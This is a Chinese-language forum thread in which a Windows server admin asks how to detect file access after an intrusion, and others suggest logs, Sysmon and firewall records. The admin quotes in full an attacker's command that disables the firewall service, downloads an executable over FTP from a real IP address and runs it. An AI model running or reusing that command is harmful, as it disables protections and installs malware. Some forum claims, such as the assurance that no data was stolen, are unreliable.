[服务器安全]如何判断此服务器数据是否被盗?

显示全部楼层 · 发表于 2019-2-27 08:12:46

本帖最后由 wkl17 于 2019-2-27 08:14 编辑

假设某台 Windows Server 2008R2 / 2012R2 被入侵了，各位会使用什么方法判断某些文件是否被下载或读取过（比如 abc.txt 文件）？

Windows 的文件访问时间感觉似乎不是我们通常理解的那样，也即：只读访问后它的时间属性不会有任何变化。所以似乎无法通过文件访问时间判断 abc.txt 这个文件是否被人访问或下载过？

还有其它可行的方法来判断吗？

或者更直接一点说吧。有一台作为远程桌面用的 Windows，没跑什么服务。

但我今天发现 cmd 命令行有些异常命令（因为执行某个不存在的 exe 卡住了，所以我通过 procexp 查看到这个异常命令）。

刚搜了一下，命令就像这个 2011 年的百度知道问题：https://zhidao.baidu.com/question/263547971.html

有个 cmd 尝试执行 ftp 命令行下载某个 exe 程序并执行。但好在我服务器安装了火绒，根据火绒的日志，已成功阻止了它下载。虽然也没什么重要数据，但我好奇的是，这个入侵者能执行类似这样的命令：c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 117.41.184.58> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe

那服务器上的某个文件（比如刚才举例的 abc.txt ）如果被入侵者下载或读取过，是否有办法判断出来？比如Windows NTFS流等等的信息？

显示全部楼层 · 发表于 2019-2-27 08:27:24

可能需要到事件日志里面查看。
前提是你设置好了日志的查看类型。
如果没有提前设置，是看不到的。
只好依赖第三方的日志了。

显示全部楼层 · 发表于 2019-2-27 14:25:11

本帖最后由 VLBI 于 2019-2-27 14:34 编辑

日志审核（日志量会太太太太太太太大）
换成我，先找有没有第三方的工具

显示全部楼层 · 发表于 2019-2-27 20:49:19

@ELOHIM
@VLBI

我当时有粗看了 Windows 系统日志，应用程序、安全、系统这 3 项日志没有发现什么明显异常的日志信息。而且文件读取记录肯定也不会记录在 Windows 系统日志的。服务器也没有跑 Web，所以也没有 Web 日志。

我遇到的情况跟百度知道那个问题很像，也是先尝试 net1 stop sharedaccess （不过被 HIPS 阻止了）。
各位认为对方执行这样的命令，可能是通过什么漏洞来实现的？

服务器是 2K12 R2，除了 R2 的近 900MB 的补丁和 xx 月恶意软件删除工具没打，其它的补丁很久以前都打过了。

因为也没跑 web，所以打了补丁后也没做更多的优化，只是使用 HIPS 类软件控制联网（需手工放行）

但我刚才 netstat，发现 137、138、445 的端口还是处于监听状态。不过我也测试了从外网 telnet，

确认这几个端口无法从外网通讯。（应该是被防火墙挡下了）。

显示全部楼层 · 发表于 2019-2-27 20:50:21

论坛不能 @ 么？

或者，假如想分析对方究竟是利用什么漏洞来入侵的，各位可有分析的方法或工具分享一下？谢谢。

显示全部楼层 · 发表于 2019-2-27 21:11:36

wkl17 发表于 2019-2-27 20:50
论坛不能 @ 么？

或者，假如想分析对方究竟是利用什么漏洞来入侵的，各位可有分析的方法或工具分享一下 ...

Sysmon[64].exe
那你试试这个吧。
除了日志，你想在哪发现入侵痕迹呢？？

显示全部楼层 · 发表于 2019-2-28 08:43:37

本帖最后由 VLBI 于 2019-2-28 08:56 编辑

@ 成功了的
系统日志可以显示的，只是日志量太大了。建议你试试ELOHIM的方法

如果真入侵了，估计也会把日志删除了吧，没了日志，查什么呢？

显示全部楼层 · 发表于 2019-2-28 10:13:13

如果你的防火墙日志设置的好，有异地备份没有被黑客删除的话，也可以查一下。
在特殊的时间，哪个进程有哪些诡异的进出站信息，端口使用情况等。

不过就像7楼所言，高手进来会抹去痕迹的。。除非忘了。

显示全部楼层 · 发表于 2019-3-1 05:32:18

本帖最后由 wkl17 于 2019-3-1 05:37 编辑

@ELOHIM
@VLBI

感谢二位的分享与解答。Sysmon应该是Procmon的前身？不知道是否有一些系统资源监控的工具？比如磁盘IO、CPU、内存使用率的监控工具？
网络带宽监控我用的networx (5.5.5版本是最后一个免费版)。
但不知道是否有像networx这么好的免费工具，能同时监控上述几项？
哪位如果知道这样的工具请分享一下。

我此次主要是想了解黑客是否会通过命令行控制台，more等命令读取个别文本文件。
如果是其他可执行文件或非文本数据，黑客应该没有盗走，否则它就不会尝试通过cmd执行ftp下载病毒文件了。
日志没有被黑客清空，但是看了也没有什么重要发现。
感觉入口应该还是Windows组件。我暂时先将一些服务关闭了： WinRM MSMQ lmhosts(NetBIOS) ScDeviceEnum（SmartCard相关服务)

显示全部楼层 · 发表于 2019-3-3 17:18:27

这只是一个病毒，后期会下载一些挖矿的程序，不会盗取你的数据。放心吧。

[系统] [服务器安全]如何判断此服务器数据是否被盗?

评分

评分